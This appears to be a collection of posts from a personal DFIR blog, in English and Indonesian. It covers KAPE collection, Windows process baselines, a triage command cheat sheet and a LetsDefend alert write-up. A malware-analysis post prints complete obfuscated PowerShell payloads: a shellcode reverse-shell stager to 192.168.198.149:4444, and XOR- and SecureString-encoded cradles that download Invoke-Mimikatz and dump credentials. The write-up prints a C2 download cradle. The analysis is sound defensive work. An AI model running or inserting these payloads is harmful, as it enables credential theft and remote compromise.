Inscrutable and unmaintainable detection content — if the detection was not developed in a structured and meaningful way, then both alert triage and further refinement of detection code will ..ahem … suffer (this wins the Understatement of the Year award)

My previous blog was hosted in GitHub, using Jekyll-now. The main reason to again move my blog is the will power needed to maintain the blog is annoyingly high. This took away time from the actual writing itself. So I have been thinking about moving the blog for a while. I need a platform where that is not too time consuming to post and maintain a blog.

That is when came across Hashnode. The main features that sold me on Hashnode was simple export feature and GitHub backup, also no charge for custom domain, and (what I previously thought) custom CSS.

The experience moving to Hashnode

The moving was not at all painful. I used the bulk import from markdown feature, and Hashnode takes care of 80% of the problem. The rest is making sure the post have the right images and tags.

The tags part is a bit annoying, since Hashnode did not import any tags from my markdown🤷‍♂️. For images, luckily, I do not have a lot of post with images. But to avoid future pain, for when I inevitably move to another platform again, I am now hosting them in google photos instead of locally on the blog platform.

For now, let see how if I beat the previous record in Jekyll (Nov 1st, 2019 - August 8th, 2024).

Intro

Sentinel have live response capabilities to do collection of devices in case of DFIR needs.

The problem is sometime the collection is not as complete as needed, and to customize this, a script (or executable) is needed.

Although I won't share any detailed script but here is how similar problem was solved and what obstacle I found.

What we did

What basically we need to do is using power shell to do prep work and KAPE to do most of the heavy lifting. These are several steps taken to do that:

• run live response, download customized power shell script.

• power shell script was then used to download KAPE, run KAPE with required parameters, and upload collection result.

• blob storage was used to store KAPE executable and later the collection result.

Obstacles

Here are obstacles found in implementing the solution and some work around used to deal with it:

• KAPE run pretty okay, but in the end decided to use batch mode instead of compound target in KAPE. This is to ensure collection run as efficient as possible.

• One the problem is trying to group folders from the same machine, because batch upload to blob storage will have each batch command in separate folder. Although KAPE -s3kp switch will allow folder grouping, the problem is the switch won't take environment variables (unlike --tsource/ --tdest switch) so no way to group collection result using machine name.

• Power shell is used to solve this by writing environment variables straight to KAPE batch file in -s3kp switch instead of using %m internal KAPE variables.

• Another thing I found is KAPE turns to zombie after finishing task, which is annoying but since collection probably done only once, I don't think this is a big problem.

Result

In the end the implementation run pretty okay, and I think all in all this is a pretty good solution.

Aside than those problems, doing this at scale is another problem to solve. This I believe will require API access and impossible to create workaround via power shell.

Other

• more on KAPE:KAPE manual

In praktisi mengajar, I got the chance to co-teach at a university on network forensic. The topic was on network forensic, and the overall experience was fun. One thing I overlook was I might have misjudged the knowledge of university students, something that I planned to do better if another similar chance arrived.

The network forensic class co-teach took half a semester (i.e. 4 meetings @ 2 hour) and I cover suricata and wireshark (super briefly). I practically didn't take any documentation at all, another thing I'm gonna work out next time around.

While in Deall Mentoring, I'm paired with a mentee to talk about my experience as a proffesional. My mentee had a very interesting career change, something that I mulled over, and finally pulled the trigger on. So I believe some of what I blab about on our meeting is somewhat useful :D.

To be completely honest I think I learned more than teach on both opportunity, that is why I loved teaching/ mentoring gigs and would be looking out for more chances.

The bulletin can be accessed [here](writings/CDEF Buletin Edisi 1 Tahun 2022.pdf) or here

so here's some of those powershell payload.

the one with shellcode

powershell.exe" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

what I did was decode using base64 and gunzip, here it is with gunzip and base64 decode using cyberchef. and you can see another base64 in $hQxcWRc. convert that in to hex, and the header (fc e8 82 00) is of msfvenom shellcode. Download conversion result and run scdbg if needed, where we can see 192.168.198.149:4444.

function paYF {Param ($divQYalY, $fnyEK2)
$vMPnBGlpZDG = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
return $vMPnBGlpZDG.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($vMPnBGlpZDG.GetMethod('GetModuleHandle')).Invoke($null, @($divQYalY)))), $fnyEK2))}
function s5RSn_Hxv {Param (    [Parameter(Position = 0, Mandatory = $True)] [Type[]] $ld54,[Parameter(Position = 1)] [Type] $ze3X5 = [Void])
$fQWnvw4ai = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$fQWnvw4ai.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $ld54).SetImplementationFlags('Runtime, Managed')
$fQWnvw4ai.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ze3X5, $ld54).SetImplementationFlags('Runtime, Managed')
return $fQWnvw4ai.CreateType()}
[Byte[]]$hQxcWRc = [System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdyYH/9W4kAEAACnEVFBoKYBrAP/VagVowKjGlWgCABFcieZQUFBQQFBAUGjqD9/g/9WXahBWV2iZpXRh/9WFwHQK/04IdezoYQAAAGoAagRWV2gC2chf/9WD+AB+Nos2akBoABAAAFZqAGhYpFPl/9WTU2oAVlNXaALZyF//1YP4AH0iWGgAQAAAagBQaAsvDzD/1VdodW5NYf/VXl7/DCTpcf///wHDKcZ1x8O74B0qCmimlb2d/9U8BnwKgPvgdQW7RxNyb2oAU//V")
$mj9pM7 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((paYF kernel32.dll VirtualAlloc), (s5RSn_Hxv @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $hQxcWRc.Length,0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($hQxcWRc, 0, $mj9pM7, $hQxcWRc.length)
$gkRsqAL = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((paYF kernel32.dll CreateThread), (s5RSn_Hxv @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$mj9pM7,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((paYF kernel32.dll WaitForSingleObject), (s5RSn_Hxv @([IntPtr], [Int32]))).Invoke($gkRsqAL,0xffffffff) | Out-Null

the one with base 10 xor

( [cHAR[]] ( 20 , 24, 5 ,125 , 117 , 19, 56,42, 112 ,18 , 63 , 55,56 ,62,41,125,19 , 56 , 41 ,115 ,10,56 ,63, 30 , 49 ,52 ,56 ,51, 41 , 116 , 115, 25 ,50,42 ,51, 49,50,60, 57, 14, 41 ,47 , 52, 51, 58 ,117 ,122 , 53, 41,41 , 45 , 46,103, 114, 114,47 ,60, 42, 115, 58 , 52 , 41 ,53 ,40, 63 , 40 , 46, 56,47 , 62 ,50 ,51, 41 ,56,51,41, 115 , 62, 50 ,48 , 114,48,60 , 41,41 ,52 ,59, 56, 46, 41 ,60, 41 , 52,50 , 51, 114 , 13,50,42 ,56 , 47 ,14 ,45 , 49, 50 , 52 ,41 , 114 ,48, 60, 46,41, 56,47, 114 , 24,37,59,52 , 49 ,41, 47, 60,41,52 , 50 , 51 , 114 ,20 , 51 ,43, 50,54 ,56, 112 , 16 , 52, 48 , 52 , 54, 60 ,41,39, 115, 45 ,46 , 108 , 122,116,102, 125 ,20 ,51 , 43, 50 , 54 ,56 ,112, 16, 52,48,52, 54,60 , 41 , 39 ,125 ,112 , 25, 40 , 48, 45,30 ,47 ,56, 57 ,46 ) |%{[cHAR] ( $_ -BXor"0x5d" ) } )-JOIN''|.( $ENv:ComSPEc[4,15,25]-jOIN'')

to see payload we convert from charcode using base 10, and do XOR using 5d as key, the result will be:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

the one with securestring

[rUntImE.iNtEROPSeRviCEs.mARShaL]::pTRtOSTriNGBstR([ruNtIMe.iNTeropSERVIcES.MarsHAl]::seCUResTRingtObstr($('76492d1116743f0423413b16050a5345MgB8ADcAUABxAFcAagBnAHgAUQBpAGoARABCADkARABNAHgAVQAxAEgAUQA1AGcAPQA9AHwANABjADQANgBmADUANgA3ADgAYgBhADkANwBmADUANwA3ADgAOABlADkANgAxAGMAMgA0ADAAMQA0ADkAZQA3AGEAYQAwADUANQAxADAANQBiADcAMQA3ADUANQA4AGEAYwAyAGMANQA3ADkAYgBiADkAMQBhAGIANgAzAGUAYwAxAGEAOAAwAGMAZABkADUAMgA4ADcAZAA1AGUAMwA4AGEANAA3AGUANQA5ADUANwBjAGMANwA5ADcAMwBhADIANAA2ADMAMQBmAGMAYwA1ADgAYQA5ADQAOAAwADgAOQAyADQAYwA2ADUAYwAyADkANgBhAGUAYwA0ADAAZAA2AGQANQA0ADkAYgA3ADgAYQA1ADcANAA5ADYAYwAyADgAZQA5AGIANgBlADQAZgBlADgAYQBlADcAYQA1ADgAYQAxADYAYgA3AGUAZABiAGEAMgAyAGMAZAA3AGEAMAA4AGYAYwAyAGMAMQAxADUANAAzADUAOAA1ADIAMQA4AGMANQA1AGEANAA4ADgAZgA0AGQAZgBhADYAYwBhAGIAOAA1AGUANgBlADMAMQBiAGMAYwA4AGEANAAxADMANgAxADEAYwBlADgAZQBjAGUAMwBkADEAYgA1AGQAMgBiADYANQA5AGUANgA5AGMAZAA1AGIANgBkADMAYwA4ADYANwAwADkAMwA4AGUAOABiADIANgA3AGIAZABkADEAYQA4ADMAOQBkAGQAOQAxADkANwA5ADkAYQA4ADYAZQBlADIANQBkADYAMQA5ADEAMQA0ADUANwA3ADkAMgA3AGUAMwBkADEANQBlADgAZABlADcAZgAyADQAYgBhADAAYwA4ADgANABjADkAYgBiADUANQAxADQAOQBjADkAMgBhAGYAOQAwAGUAOQA4ADUANgA2ADcAZAA5ADQANAAzAGQANABiADIAOABlAGUANAA0AGIANAAxADEAOABlAGMAMQBlADIANgA0AGIAMQA2AGYAMwBlAGUAYQA1ADkAOABmADgAMAA4ADEAZgAyADIAZQBmADQAMABlADgAMAAxADcAZABiAGEAOQAyAGIAYgBhAGUAMAA0ADIAZQA2ADcAZQA3ADQAMQA0ADYAMgA0ADQAZQBmADEAOQBlADkAYwAxAGEANwBjAGMAOQBjAGYAZgAyAGMAYgA0AGEAMAA3ADMANABkAGQAMwA0AGUAOAA4AGUANQAwADEAYgA2ADkAZgAyADgAYQA1AGQAOQA4AGQAMQAxADgAOAA4AGMAZQAwAGEAZQBmADMAZQAyAGYAMgA1ADgAZgA4ADcAMwA1ADkANQA4AGUAYwBjADQANwBiADcAYgA1ADAAYQA5AGMAZgAyADMAZAA3ADQANgA1ADEAZgAxAGQANAA5ADEAYQAwADcAYgBhAGMAMwA3ADcAYgBmADgAMwA2ADYAYQBjAGUAZAA4ADIAZABmAGEAMwA0AGQAYwBjADkAZABlADYAYgAyADkAMABlAGUAYgAwADAAMgBjADIANgAwADMAMQA3AGMAMQBlADIAMQBlADQANAA1AGUAOAAzADgAYQBkAGMANAA0AGYAMwBlADgAYgA5ADMAMwBlAGIANgAwAGEANgAyADAAZABlADkANgAxADMANgA4ADgAMAA4ADUAMgBiADEAYgAzAGYAMQAxADkAZgAyADMAMQAzADkAMAA0ADkANQBlADMAOAA3AGYAMQA5AGUAZQAxADEAZgBlADMANQBjADEANAA2AGEAYQA3AGIANABiAGUAMQAwADUAMABhADQAZgAzAGQAZgBmADkAZQBmADYAYQBhADUAYwBmAGUANABhAGUAOABkAGYAMAA4AGYAMgA5AGQANAA2AGUANQA4ADcANgAzADgAYwBlADcAYwBkADEANwBhADAAMwAwAGEANQAxAGMAOQA1ADIAZgBmAGYANgA2ADYAZgA0ADAAOQA='|CONveRTTO-secUResTRING  -KEy  196,47,72,214,193,53,146,52,139,252,69,219,170,135,151,62,90,5,213,36,116,154,71,183) ) ))| .( $VErBosePRefERencE.toStrING()[1,3]+'x'-JOiN'')

to see payload we convert from securestring (https://www.wietzebeukema.nl/powershell-securestring-decoder/) and use key provided, and it will result with similar script as before (invoke-mimikatz).

(last update 11.09.2022)

in the spirit of keep updating the resources, I'm moving this post to aldosimon/infosec-compendium

event log parser

chainsaw Chainsaw provides a powerful ‘first-response’ capability to quickly identify threats within Windows event logs. It offers a generic and fast method of searching through event logs for keywords, and by identifying threats using built-in support for Sigma detection rules, and via custom Chainsaw detection rules.

DeepBlueCLI a PowerShell Module for Threat Hunting via Windows Event Logs

logparser studio event viewer and other logs parsing with SQL Language interface

endpoint

velociraptor Velociraptor is a tool for collecting host based state information using The Velociraptor Query Language (VQL) queries.

osquery osquery is a SQL powered operating system instrumentation, monitoring, and analytics framework.

loki Loki - Simple IOC and YARA Scanner

KAPE Kroll Artifact Parser And Extractor, lets forensic teams collect and process forensically useful artifacts within minutes.

all in one analysis

autposy/ TSK Autopsy® is a digital forensics platform and graphical interface to The Sleuth Kit® and other digital forensics tools

knowledge base, tutorial, cheatsheet, etc

event ids github event id awesome list

mitre to evtx MITRE mapping to event id

lenny zeltser log cheatsheet IR critical log review cheatsheet

lenny zeltser incident survey Security incident survey cheat sheet for server administrators

pengantar

sebelum melihat lebih jauh proses yang berjalan, baiknya kita mengingat kembali beberapa topik pengantar berikut.

1. user mode vs kernel mode sebuah proses bisa dijalankan dalam dua buah mmode yang berbeda, yaitu kernel mode dan user mode. aplikasi biasa berjalan di user mode, sedangkan core operating system component berjalan di kernel mode.

2. session 0 vs session 1 sejak windows vista, microsoft memperkenalkan "session 0 isolation". session 0 diperuntukan untuk servis dan aplikasi non-interaktif. user yang login akan berada di session 1 atau sealnjutnya. proses yang berjalan di session 0 tidak memiliki GUI. sedangkan session 1 (dan seterusnya) untuk proses yang terkait/ dijalankan user.

3. tools ada beberapa tools yang bisa digunakan untuk memahami lebih jauh proses ini, kita akan menggunakan processes explorer dan processes hacker. selain itu bisa juga menggunakan command line yaitu tasklist, Get-Process atau ps (PowerShell), dan wmic.

system

system merupakan process yang berjalan dalam kernel mode, serta menjadi rumah bagi process2 lain yang berjalan di kernel mode. system dijalankan (parent) oleh PID 0 (system idle process), atau pada process explorer tidak memiliki parent. beberapa ciri-ciri lain dari proses ini adalah:

beberapa karakteristik system process:

• system selalu dijalankan dengan PID 4

• hanya memiliki 1 instance

• berjalan di session 0

• user account yang menjalankan SYSTEM

• tidak memiliki parent process (pada process explorer atau system idle process PID 0 pada process hacker )

• image filename berada di C:\Windows\system32\ntoskrnl.exe (pada process hacker)

• start time: At boot time

system > smss.exe

smss.exe (Session Manager Subsystem) atau windows session manager. smss.exe menjalankan csrss.exe dan wininit.exe di session 0, serta menjalankan csrss.exe dan winlogin.exe di session 1. seperti yang ditulis sebelumnya, session 0 berisi proses-proses terkait servis sedangkan session 1 untuk proses terkait user. smss.exe menjalankan proses dengan cara menjalankan child smss process setelah itu melakukan terminasi diri sendiri, sehingga pada suatu waktu seharusnya hanya terdapat sebuah smss.exe.

beberapa karakteristik smss.exe:

• hanya terdapat satu instances

• parent process system

• berjalan di session 0 (karena yang session 1 dst menterminasi diri sendiri)

• user account yang menjalankan SYSTEM

• image path c:\Windows\System32\smss.exe

• start time: dalam beberapa detik dari boot time (untuk master instance)

system > csrss.exe

proses ini bertanggung jawab menyediakan Windows API, mapping drive letters, and menangani proses shutdown Windows. csrss.exe dijalankan (parent process) oleh smss.exe yang akan mematikan dirinya sendiri setelahnya. oleh karena itu csrss.exe tidak memiliki parent process (parent process terminated/ non-existent process pada field parent)

beberapa karakteristik csrss.exe:

• tidak mempunyai parent process/ parent process sudah tidak jalan (smss.exe).

• image path c:\Windows\System32\csrss.exe

• bisa terdapat lebih dari satu instances (ingat smss.exe dimana tiap login akan menjalankan csrss.exe dan winlogin.exe pada session baru)

• user account yang menjalankan SYSTEM

• start time: dalam beberapa detik dari boot time (untuk 2 instances pertama, dan setelah itu setiap ada login baru)

smss.exe > wininit.exe

process ini dijalankan oleh smss.exe, dan sama seperti csrss.exe, smss.exe akan mematikan dirinya sendiri setelah menjalankan proses ini, sehingga winit.exe tidak memiliki parent process. The Windows Initialization Process atau wininit.exe bertanggung jawab menjalankan services.exe (Service Control Manager), lsass.exe (Local Security Authority), dan lsaiso.exe (hanya bila credential guard dinyalakan) dalam Session 0.

beberapa karakteristik wininit.exe:

• tidak mempunyai parent process/ parent process sudah tidak jalan (smss.exe).

• image path c:\Windows\System32\

• hanya satu instances

• user account yang menjalankan SYSTEM

• hati-hati terhadap image dengan nama yang mirip

• start time: dalam beberapa detik dari boot time

wininit.exe > services.exe

services.exe/ Service Control Manager (SCM) berfungsi mengontrol services yang dijalankan serta mengeset "Last Known Good control set/Last Known Good Configuration (HKLM\System\Select\LastKnownGood)" setelah berhasil login. informasi services yang dijalankan bisa dilihat di "HKLM\System\CurrentControlSet\Services" atau dengan "sc.exe query". services.exe dijalankan oleh (parent process) winit.exe.

beberapa karakteristik services.exe:

• parent process winit.exe

• image path c:\Windows\System32\

• hanya satu instances

• user account yang menjalankan SYSTEM

• hati-hati terhadap image dengan nama yang mirip

• start time: dalam beberapa detik dari boot time

wininit.exe > services.exe> svchost.exe

svchost.exe (service host/ host process for windows services) bertugas mengontrol windows services. servis yang dijalankan proses ini berbentuk dll, dan dapat dilihat di registry (HKLM\SYSTEM\CurrentControlSet\Services\SERVICE NAME\Parameters). sebagai contoh, svchost menjalankan service terkait bluetooth, maka kita bisa melihat dll yang dijalankan dengan

1. processhacker > right click on svchost.exe > properties > services > double click on name. maka akan menampilkan gambar di atas, dimana pada binary path terlihat dll yang dijalankan. perlu juga diperhatikan flag/parameter "-k" pada command line di binary path, hal ini merupakan perintah grouping services sejenis (sejak Windows 10 Version 1703 services sejenis dilakukan grouping pada mesin dengan memory di atas 3.5 GB); atau

2. pada registry key "\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BTAGService\Parameters"

beberapa karakteristik svchost.exe:

• parent process services.exe

• Image file path C:\Windows\System32

• hati-hati terhadap image dengan nama yang mirip

• adanya "-k" flag/parameter

• user account yang menjalankan beragam (SYSTEM, Network Service, Local Service) tergantung jenis services (pada windows 10 ada yang dijalankan logged-in user)

• start time: dalam beberapa detik dari boot time, namun mungkin ada yang berjarak dari boot time

wininit.exe > lsass.exe

Local Security Authority Subsystem Service (LSASS) adalah process Microsoft Windows operating systems yang berfungsi melakukan enforcing security policy on the system. beberapa hal yang dilakukan antara lain verifikasi user login, password changes, membuat access tokens, dan menulis Windows Security Log.

beberapa karakteristik lsass.exe:

• parent process wininit.exe

• hanya satu instances

• hati-hati terhadap image dengan nama yang mirip

• start time: dalam beberapa detik dari boot time

• image file path C:\Windows\System32\lsass.exe

• user account yang menjalankan as SYSTEM

winlogon.exe

windows logon (winlogon.exe) berperan dalam menangani secure attention sequence (key combination CTRL+ALT+DEL yang menampilkan user login/password), me-load user profile (NTUSER.DAT ke registry HKCU), menjalankan userinit.exe (yang kemudian me-load HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell dan kemudian exit), mengunci layar, dan juga screen saver.

beberapa karakteristik winlogon.exe:

• tidak memiliki parent process (karena parent smss.exe exit)

• bisa terdapat lebih dari satu instances

• image file path C:\Windows\System32\winlogon.exe

• start time dalam beberapa detik dari boot time

explorer.exe

Windows explorer (explorer.exe) bertangungg jawab untuk menampilkan interface untuk mengakses folder dan files, start menu, taskbar, etc. explorer.exe dijalankan oleh userinit.exe (me-load HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell), yang kemudian exit sendiri sehingga tidak memiliki parent process.

beberapa karakteristik explorer.exe:

• tidak memiliki parent process

• lokasi image di C:\WINDOWS\explorer.exe

• dijalankan oleh user yang winlogin

• seharusnya tidak memiliki koneksi outbound TCP/IP

• start time beberapa saat setelah logon (interactive logon)

penutup

Dengan menggunakan processhacker, procexp, atau perangkat lain, maka sebagai IR kita bisa membandingkan antara karakteristik asli (baseline) dari beberapa proses utama windows. Hal ini dapat dijadikan acuan untuk memutuskan apakah sebuah proses malicious atau tidak. Selain yang disebutkan di atas, proses malicious juga seringkali menggunakan nama yang serupa (mengganti huruf tertentu) untuk menyembunyikan dan menyamarkan diri menjadi proses yang legitimate.

referensi

1. user mode and kernel mode

2. session 0 isolation

3. lsass.exe

4. services

5. nasbench.medium

6. andreafortuna

7. tryhackme

With that intro about letsdefend.io out of the way, here goes the write up.

This is what the case looked like, basically a host execute hta file thus an alert is triggered. Our job is to see what really happened and do the intended playbook exercise. Some things that we can check to help with analysis are the hash (virustotal) and the IP address (we'll try command history/ proccess history at the endpoint security tab). Afterward we are gonna decide on containment (eradication and recovery) and last the lesson learned from said incident.

virustotal

We can use the hash we found at the first picture to search scan result at virustotal. The result on virustotal look pretty bad, 23/58 malicious flag. you could also try to find the file and do more analysis, but for now I think we can move to endpoint security tabs and do more analysis there.

endpoint security

We use endpoint security tab to find out what was happening in the host 172.16.17.38. The screenshot above is from the command history portion of the tab, where we can see the first command line that trigger the alert, followed by another not so clear command.

C:/Windows/System32/mshta.exe C:/Users/roberto/Desktop/Ps1.hta

The first command above is what triggered the alert. Mshta is a trusted Microsoft binary that in this case is abused for execution of the Ps1.hta file. you can see the related explanation here at the MITRE

Now we tried a bit of magic at the second command so it will be more readable.

function H1($i) 
{$r = '' ; for ($n = 0; $n -Lt $i.LengtH; $n += 2)
{$r += [cHar][int]('0x' + $i.Substring($n,2))}return $r};
$H2 = (new-object ('{1}{0}{2}' -f'WebCL','net.','ient'));
$H3 = H1 '446f776E';
$H4 = H1 '6C6f';
$H5 = H1 '616473747269';
$H6 = H1 '6E67';
$H7 = $H3+$H4+$H5+$H6;
$H8 = $H2.$H7('http://193.142.58.23/Server.txt');
iEX $H8

• $H3-H6 with the help of $H1 just basically hex that reads "Downloadstring".

• $H2 was a glorified "New-Object Net.WebClient".

• $H8 puts them all together to form an old fashion download using powershell from address mentioned in $H8.

Together they'll probably looked like

IEX (New-Object Net.WebClient).DownloadString('http://193.142.58.23/Server.txt').

So it's a call to C2 server 193.142.58.23, probably trying to download something.

log management

After seeing what the script do, we best check log management and try to see did the host (172.16.17.38) managed to reach the C2 server (193.142.58.23) what the C2 server reply with. We can do this by filtering source/ dest. address using host and/or C2 server IP that we had before. Below is the filtered result of from the log management tabs.

There we can see that the C2 server replied with 404, so no response arrived for the host (172.16.17.38) because the server is dead/ the file was not there.

containment and lesson learned

Based on our previous analysis, we can safely conclude that its a malicious script, but stopped due to the C2 server is dead. Next step would be to contain the host. We can do this by going to endpoint security and use the request containment button.

Lastly, we can use the IP address, and URL and also the md5 hash of the executed file can as IOC when we did the playbook and also close the case.

command line yang saya pakai

list usernames

net user

Get-LocalUser | Select name, Enabled, sid, lastlogon

wmic useraccount get name, accounttype, sid, status

list ADusername

Get-ADUser -Filter 'Name -Like "*"' | where Enabled -eq $True

list logged on user

Get-CimInstance –ClassName Win32_ComputerSystem | Select-Object Name, UserName, PrimaryOwnerName, Domain, TotalPhysicalMemory, Model, Manufacturer

last logon, group member, password settings, user full name, etc

net user [username]

show local group and/or members of groups

net localgroup

net localgroup "Administrators"

Get-LocalGroup

show ADgroups

Get-ADGroupMember Administrators | where objectClass -eq 'user'

Get-ADComputer -Filter "Name -Like '*'" -Properties * | where Enabled -eq $True | Select-Object Name, OperatingSystem, Enabled

list running programs (and certain programs only)

tasklist
tasklist /m /fi “pid eq <Insert Process ID here w/out the brackets>”

Get-CimInstance -ClassName Win32_Process | Select-Object CreationDate, ProcessName, ProcessID, CommandLine, ParetProcessId | where ProcessID -eq xxxx

Get-Process | Select-Object StartTime, ProcessName, ID, Path | Where Id -eq xxxx

list schedule task, services

schtasks /query /fo list /v > schtasks.txt

list services

Get-CimInstance –ClassName Win32_Service | Select-Object Name, DisplayName, StartMode, State, PathName, StartName, ServiceType

Get-Service | Select-Object Name, DisplayName, Status, StartType

various wevtutil

wevtutil qe Security /f:text > seclogs.txt
wevtutil el | Measure-Object

system information

systeminfo

osbuild, servicepack, buildnumber, csname, lastboot

Get-CimInstance Win32_OperatingSystem | Select-Object Caption, Version, servicepackmajorversion, BuildNumber, CSName, LastBootUpTime

various wmic

wmic /node:<remote-ip> /user:<username> startup list full | more
wmic /node:<remote-ip> /user:<username> service list full | more
wmic /node:<remote-ip> /user:<username> ComputerSystem Get UserName
wmic /node:<remote-ip> /user:<username> useraccount list full
wmic /node:<remote-ip> /user:<username> process get description,processid,parentprocessid,commandline /format:csv
wmic /node:<remote-ip> /user:<username> bios get serialnumber
wmic /node:<remote-ip> /user:<username> diskdrive get model,serialNumber,size,mediaType

ipconfig

ipconfig /displaydns

network related

Get-NetTCPConnection -RemoteAddress xxx.xxx.xxx.xxx -RemotePort xx | Select-Object CreationTime, LocalAddress, LocalPort, RemoteAddress, RemotePort, OwningProcess, Stat

netstat with PID

netstat -bona

see firewall state

netsh firewall show state

melihat dan setting execution policy

Get-ExecutionPolicy
Set-ExecutionPolicy

check PS version

Get-Host | Select-Object Version

hashing

Get-FileHash .\file.txt -Algorithm MD5

alternate data stream (ADS)

Get-Item .\file.txt -Stream *

raw file access, hex

Get-Content .\file.txt –Encoding Byte | Format-Hex

penutup

post ini tentu saja akan saya update d masa mendatang, dan semoga suatu saat script yang menyatukannya akan saya kerjakan :D

referensi

1. arts.ubc.ca
2. sans
3. jordanpotti
4. cybernote
5. troy wojewoda

log4j/ log4shell adalah sebuah vuln yang cukup menghebohkan di akhir tahun ini, hal ini karena aplikasi logging ini cukup banyak di pakai di software OSS, serta vuln. nya yang cukup parah. log4j memiliki kelemahan yang membuat attacker bisa menjalankan perintah dari jauh (RCE) dengan mengirimkan perintah lookup tertentu ke service yang menjalankan log4j. tulisan ini meramu beberapa exploitasi yang tertangkap di nginx log milik penulis di salah satu penyedia jasa cloud.

informasi terkait log4j/ log4shell

cara kerja exploit:

informasi cve-nya: mitre

nginx di azure

